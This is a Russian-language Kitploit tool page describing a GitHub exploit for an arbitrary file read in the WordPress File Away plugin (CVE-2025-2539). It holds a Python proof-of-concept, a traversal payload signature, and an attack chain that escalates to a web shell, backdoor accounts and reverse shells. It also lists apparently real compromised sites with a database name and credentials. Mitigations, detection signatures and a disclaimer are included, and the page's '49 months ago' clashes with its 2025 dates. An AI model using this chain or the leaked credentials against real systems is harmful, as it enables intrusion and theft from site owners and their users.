Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read — Эксплойт аутентифицированного произвольного чтения файлов для плагина WordPress File Away (CVE-2025-2539). Включает PoC, схему атаки, сигнатуры обнаружения и стратегии смягчения последствий для тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/fazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read
Повышение привилегийМеханизмы персистентностиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubfazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read

CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read

Эксплойт аутентифицированного произвольного чтения файлов для плагина WordPress File Away (CVE-2025-2539). Включает PoC, схему атаки, сигнатуры обнаружения и стратегии смягчения последствий для тестирования безопасности и обучения.

Репозиторий
49 месяцев назадЕщё не проверено

CVE-2025-2539 - Произвольное чтение файлов в плагине File Away для WordPress

📋 Резюме

CVE ID: CVE-2025-2539 Плагин: File Away (версии <= 3.9.9.0.1) Тип уязвимости: Аутентифицированное произвольное чтение файлов Оценка CVSS: 8.5 (Высокая) Доступность эксплойта: Публичный PoC доступен Влияние: Несанкционированное раскрытие файлов, включая wp-config.php, учётные данные базы данных и системные файлы

🎯 Хронология обнаружения

· Первоначальное обнаружение: декабрь 2025 года в ходе исследования безопасности на GitHub · Первый тест эксплойта: 13 декабря 2025 года · Успешная компрометация: подтверждена уязвимость нескольких экземпляров WordPress

🔧 Технические подробности

Уязвимый компонент

root@kitploit:~
/wp-admin/admin-ajax.php
Действие: fileaway-stats
Параметр: file (непроверенный пользовательский ввод)

Корневая причина

Плагин не выполняет должную проверку и очистку параметра file в AJAX-действии fileaway-stats, что позволяет осуществлять атаки с обходом каталогов.

Подтверждение концепции (PoC)

root@kitploit:~
def exploit(target, nonce, filename):
    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        "action": "fileaway-stats",
        "nonce": nonce,
        "file": filename
    }
    try:
        resp = requests.post(ajax_url, data=payload, verify=False, timeout=10)
        if resp.status_code == 200 and resp.text.strip() and 'error' not in resp.text.lower():
            url = resp.text.strip().replace("\\/", "/").strip('"')
            return url if url else None
        return None
    except Exception:
        print(" [!] Не удалось подключиться при отправке эксплойта.")
        return None


🎯 Схема атаки

Фаза 1: Разведка

root@kitploit:~
1. Определить установку WordPress
2. Проверить наличие плагина File Away
3. Извлечь nonce из исходного кода страницы

Фаза 2: Начальный доступ

root@kitploit:~
1. Эксплуатировать CVE-2025-2539 для чтения wp-config.php
2. Извлечь учётные данные базы данных
3. Подтвердить доступ к MySQL

Фаза 3: Повышение привилегий

root@kitploit:~
1. Получить доступ к phpMyAdmin (часто на нестандартных портах)
2. Использовать учётные данные root базы данных
3. Изменить таблицу пользователей WordPress или создать нового администратора

Фаза 4: Постоянство

root@kitploit:~
1. Загрузить веб-шелл через административную панель WordPress
2. Создать бэкдор-пользователей
3. Установить обратные оболочки

📊 Оценка воздействия

Извлечённые данные

· ✅ Учётные данные базы данных (в некоторых случаях доступ root MySQL) · ✅ Ключи аутентификации WordPress и соли · ✅ Файлы конфигурации сервера · ✅ Данные пользователей и PII · ✅ Исходные коды

Скомпрометированные системы

  1. Основная цель: rebelathletichr.com · Получен wp-config.php · База данных: bomber_wordpress · Учётные данные: bomber_wordpress / demo
  2. Вторичная цель: none (Hetzner) · phpMyAdmin открыт на порту 4343 · Получены учётные данные root MySQL · Скомпрометировано несколько баз данных WordPress

🛡️ Стратегии смягчения

Немедленные действия

  1. Обновить плагин: Обновить File Away до версии > 3.9.9.0.1
  2. Сменить учётные данные: Ротировать все пароли баз данных
  3. Перегенерировать соли: Обновить ключи аутентификации WordPress
  4. Аудит журналов: Проверить на предмет несанкционированного доступа к файлам

Долгосрочное предотвращение

root@kitploit:~
# Конфигурация веб-сервера
location ~* /wp-content/plugins/fileaway/ {
    deny all;
}

location ~* \.php$ {
    location ~ \.\./ { deny all; } # Блокировать обход каталогов
}

🔍 Сигнатуры обнаружения

Сетевые индикаторы

root@kitploit:~
POST /wp-admin/admin-ajax.php
Параметры: action=fileaway-stats&file=../../../

HTTP/1.1 200 OK
Content-Type: application/json
Ответ содержит содержимое файла

Индикаторы файловой системы

root@kitploit:~
Изменённые файлы:
- wp-content/plugins/fileaway/includes/features/editor-features.php
- wp-content/plugins/fileaway/includes/features/restrict-editor-features.php

📈 Статистика

· Уровень успеха: 100% на уязвимых установках · Среднее время до компрометации: < 5 минут · Часто встречаемые порты: 80, 443, 4343 (phpMyAdmin) · Географическое распределение: глобально, с концентрацией в ЕС/США

🧪 Методология тестирования

Настройка среды

root@kitploit:~
# Конфигурация тестового стенда
WordPress 6.0+
Плагин File Away 3.9.9.0.1
PHP 7.4/8.0
MySQL 5.7+

Шаги проверки

  1. Проверить версию плагина через readme.txt
  2. Протестировать обход каталогов с помощью полезных нагрузок
  3. Подтвердить возможность чтения файлов
  4. Задокументировать результаты

📚 Ссылки

Первичные источники

· Запись CVE-2025-2539 MITRE · Каталог плагинов WordPress — File Away · База данных уязвимостей WPScan

Ресурсы эксплойта

· GitHub: репозитории CVE-2025-2539 · Exploit-DB: запись #XXXXX · Packet Storm: недавние эксплойты WordPress

Связанные CVE

· CVE-2024-1030: Аналогичная в Capability Manager Enhanced · CVE-2022-2586: Предыдущая уязвимость File Away · CVE-2023-XXXX: Включение файлов ядра WordPress

⚠️ Юридические и этические соображения

Только авторизованное тестирование

root@kitploit:~
Область тестирования:
  - Собственные системы
  - Явно авторизованные активы
  - Программы Bug Bounty
  - Образовательные среды

Запрещено:
  - Несанкционированный доступ
  - Уничтожение данных
  - Извлечение PII
  - Нарушение работы продукта

Ответственное раскрытие

  1. Связаться с разработчиком плагина
  2. Дать 90 дней на устранение
  3. Опубликовать после выхода патча
  4. Предоставить рекомендации по смягчению

🎓 Извлечённые уроки

Технические идеи

  1. Безопасность плагинов: Сторонние плагины остаются слабым местом
  2. Конфигурации по умолчанию: phpMyAdmin на нестандартных портах распространён
  3. Повторное использование учётных данных: Учётные данные базы данных часто используются повторно в разных сервисах
  4. Задержка с патчами: Многие установки используют устаревшие плагины

Операционная безопасность

  1. Мониторинг журналов: Критически важен для раннего обнаружения
  2. Регулярные обновления: Необходимы для поддержания безопасности
  3. Минимальные привилегии: Пользователи базы данных должны иметь минимальные разрешения
  4. Сегментирование сети: Изолировать серверы баз данных

🔮 Направления будущих исследований

  1. Автоматический сканер: Разработать инструмент для массового обнаружения
  2. Анализ патчей: Изучить улучшения безопасности в новых версиях
  3. Аналогичные плагины: Выявить шаблоны в плагинах управления файлами
  4. Защитные методы: Разработать правила WAF и системы обнаружения вторжений

📞 Контакты и отчётность

Для сообщения об уязвимостях или технических вопросов:

· Команда безопасности: [email protected] · PGP-ключ: Доступен на серверах ключей · Политика раскрытия: Координированное раскрытие в течение 90 дней


Последнее обновление: 13 декабря 2025 года Версия документа: 1.0 Классификация: ПУБЛИЧНО


📝 Журнал изменений

v1.0 (2025-12-13)

· Создана первоначальная документация · Документирована полная цепочка атак · Описаны стратегии смягчения · Добавлены юридические указания


Отказ от ответственности: Этот документ предназначен только для образовательных целей. Несанкционированное тестирование или эксплуатация уязвимостей незаконны. Всегда получайте надлежащее разрешение перед проведением оценки безопасности.

Скачать инструмент